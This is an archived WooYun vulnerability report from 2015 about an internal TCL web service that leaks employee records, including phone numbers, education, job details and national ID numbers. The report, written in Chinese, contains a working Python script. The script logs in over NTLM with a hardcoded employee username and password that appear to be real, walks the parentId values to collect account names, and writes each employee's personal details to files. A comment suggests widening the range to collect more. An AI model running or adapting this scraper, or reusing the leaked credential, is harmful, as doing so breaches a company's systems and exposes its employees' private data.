乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-19: 细节已通知厂商并且等待厂商处理中 2015-05-24: 厂商已经主动忽略漏洞,细节向公众公开
员工的安全意识不足~
WooYun: TCL内部信息泄露 员工内部账号泄露
变换parentId的值可以遍历所有员工的AdAccount。
通过:http://epwf.tclcom.com/ashx/GetRequestorJosnHandler.ashx可以查询出员工的详细信息。
可以查到电话、毕业院校、学历、职位、部门、身份证(IDNo)等blabla...一堆东西。
#!/usr/bin/env python# coding: utf-8# pip install requests requests_ntlmimport re,sys,os,timeimport requestsfrom requests_ntlm import HttpNtlmAuthreload(sys)sys.setdefaultencoding('utf-8')AD_REGX = re.compile(r'AdAccount":"([^"]+?)"')def get_account(start_num, end_num): result_file = 'tcl_account.txt' try: with open(result_file, 'a') as f: for id in xrange(start_num, end_num): url = "http://epwf.tclcom.com/ashx/OUTreeViewHandler.ashx?parentId=%s" % str(id).zfill(8) print url json = get(url) result = AD_REGX.search(json) if result: f.write('%s\n' % json) except Exception,e: result_file =None print e.messgae return result_filedef get_info(file_account): if os.path.isfile(file_account): with open(file_account, 'r') as f: with open('tcl_info.txt', 'a') as info_f: for line in f.readlines(): account_list = AD_REGX.findall(line) for user in account_list: url = 'http://epwf.tclcom.com/ashx/GetRequestorJosnHandler.ashx' data = {'accountId':user.replace('\\\\','\\'), 'ApproverType':'0'} print user info = get(url, method='POST', data=data) if info: info_f.write('%s\n' % info)def get(url, method='GET', data=None): url = "%s" % url result = '' pagecount = 1 auth_nt = HttpNtlmAuth('TCT-HQ\\mingxiao.li', 'mobile#3') if method == 'POST': req = requests.post(url=url, auth=auth_nt, data=data) else: req = requests.get(url=url, auth=auth_nt) if req.status_code == 200: result = req.text return resultif __name__ == '__main__': result_account = get_account(100, 200) # 这里可以修改成100,888888,获得更多信息 if result_account: get_info(result_account)
提高员工的安全意识
危害等级:无影响厂商忽略
忽略时间:2015-05-24 14:10
漏洞Rank:15 (WooYun评价)
暂无